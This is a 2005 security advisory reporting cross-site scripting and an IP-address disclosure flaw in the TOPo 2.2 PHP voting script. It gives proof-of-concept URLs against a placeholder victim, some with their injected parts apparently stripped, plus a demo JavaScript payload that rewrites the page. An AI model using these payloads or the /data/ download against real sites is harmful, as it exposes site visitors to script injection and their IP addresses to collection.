####################################################### TOPo 2.2 multiple variable & fields XSS and information disclosure vendor url:http://ej3soft.ej3.net/index.php?m=info&s=topo&t=info advisore: http://lostmon.blogspot.com/2005/05/topo-22-multiple-variable-fields-xss.html vendor notified: yes exploit available: yes. ####################################################### TOPo is a free TOP system written in PHP that works without MySQL database.TOPo is specially designed for web sites hosted in web servers that not offer a quality MySQL support. TOPo contains a flaw that allows a remote cross site scripting attack.This flaw exists because the application does not validate 'm','s','ID','t' and possible other parameters upon submission to the 'index.php'script.This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server,leading to a loss of integrity. TOPo contains a flaw too that allow remote users to information disclosure. all data are stored in '/data/' folder and all *.dat files store all votes , comments and other information about the site on top. Any user can download this files and obtain all client ip address(all clients who are vote or added a comment) ################ software use: ############### Microsoft Windows 2000 [Version 5.00.2195] all fixes. Internet explorer 6.0 sp1 all fixes. Netcraft toolbar 1.5.6 ( detects all attacks XSS in this case :D) Google toolbar 2.0.114.9-big/es ########### versions: ########### TOPo v2.2.178 vulnerable. ############## solution ############## no solution was available at this time. ############ time line ############ discovered: 13 may 2005 vendor notify: 19 may 2005 vendor response: vendor fix: disclosure: 20 may 2005 ###################### Proof of concepts XSS ###################### http://[victim]/topo/index.php?m=top"> &s=info&ID=1114815037.2498 http://[victim]/topo/index.php?m=top&s=info&ID=1115946293.3552 "> &t=puntuar http://[victim]/topo/index.php?m=top&s=info"> &ID=1115946293.3552&t=puntuar http://[victim]/topo/index.php?m=top"> &s=info&ID=1115946293.3552&t=puntuar http://[victim]/topo/index.php?m=top&s=info&t=comments&ID= 1114815037.2498"> http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1 &ID=1111068112.7598"> http://[victim]/topo/index.php?m=members&s=html&t=edit"> ######################### Wen try to added a new comment some fields are vulnerable to XSS style attacks. http://[victim]/top/index.php?m=top&s=info&t=comments&paso=1&ID=1115946293.3552 field name vulnerable, Your web field vulnerable and your email field are vulnerable. ################## example of js.js ################## Thnx to http://www.drorshalev.com for this script and for hosting it for this demonstration. ################# js.js ################# function showIt(){ document.body.innerHTML="
Your PC Can be hacked Via "+ document.domain +" XSS ,Html Injection to a Web Site "+document.domain +" By DrorShalev.com


"+ document.body.innerHTML window.status="Your PC Can be hacked Via "+ document.domain +" XSS ,Html Injection to a Web Site "+document.domain +" By DrorShalev.com" setTimeout("window.open('view-source:http://sec.drorshalev.com/dev/injection/xss.txt')",6000); } setTimeout("showIt()",2000); ################ data disclosure ################ http://[victim]/data/ ################ EnD ##################### thnx to estrella to be my ligth thnx to all http://www.osvdb.org Team Thnx to http://www.drorshalev.com and dror for his script and for hosting it !!!! thnx to all who day after day support me !!! -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Data Mangler of: http://www.osvdb.org -- La curiosidad es lo que hace mover la mente....